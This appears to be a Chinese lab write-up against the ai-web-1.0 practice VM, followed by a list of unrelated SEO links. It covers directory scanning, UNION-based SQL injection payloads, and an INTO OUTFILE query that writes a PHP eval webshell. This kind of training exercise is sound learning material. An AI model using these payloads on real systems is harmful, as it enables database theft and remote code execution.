当前位置: 首页 > wzjs >正文

公司网站怎么发布文章友链购买有效果吗

公司网站怎么发布文章,友链购买有效果吗,做电器哪个网站好,做网站的域名怎么申请1.环境 虚拟机:kali 靶机:ai-web-1.0 2.获取靶机ip 确认靶机ip为192.168.13.160 3.获取绝对路径 用御剑扫描发现两个路径 http://192.168.13.160/robots. txt和http://192.168.13.160/index.html 发现一些路径 用kali的dirb扫描发现一个info.php文件…

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径

http://www.dtcms.com/wzjs/230379.html

相关文章:

  • 如何用zblog做棋牌网站网络推广有哪些
  • 网络网站建设办公友情链接地址
  • 徐州建网站产品网络推广的方法有哪些
  • 专业的企业智能建站比较好网店代运营骗局流程
  • 男女做爰免费网站网站建设制作公司
  • 电商 网站 降低 跳出率 措施 效果建网站用什么软件
  • ps网站如何做烫金的文字做百度推广效果怎么样
  • 一个网站主机多少钱个人如何在百度做广告
  • 有没有catia做幕墙的网站谷歌seo排名公司
  • win7建设网站教程互联网广告销售好做吗
  • 商务网站的建设与管理网站需要怎么优化比较好
  • 建站的cms百度帐号登录入口
  • 网站建设软件 优帮云网站收录情况查询
  • 西安公司网站如何建设怎么引流到微信呢
  • 湖南省住房建设厅网站北京网站优化外包
  • 美容茌哪个网站做宣传好优化用户体验
  • dede 中英文网站 怎么做网站优化
  • 福州大学学生网站建设和学生上网管理条例网络营销服务策略
  • 哪里有网站建设加工东莞今天的最新通知
  • 兰州微网站建设郑州高端网站建设哪家好
  • 西宁网站建设服务公司大的网站建设公司
  • 如何做一个网站推广自己的产品seo优化推广技巧
  • 清华大学绿色大学建设网站seo关键词优化软件
  • 可以做数学题的网站网店运营推广登录入口
  • 做简单网站代码个人网站
  • 如何免费注册网站西安seo学院
  • 马云早期在政府做网站网站推广找客户
  • 微网站建设需付费吗下载百度2023最新版安装
  • 做电影网站如何赚钱google chrome网页版
  • 做网站360业务2023年新闻热点事件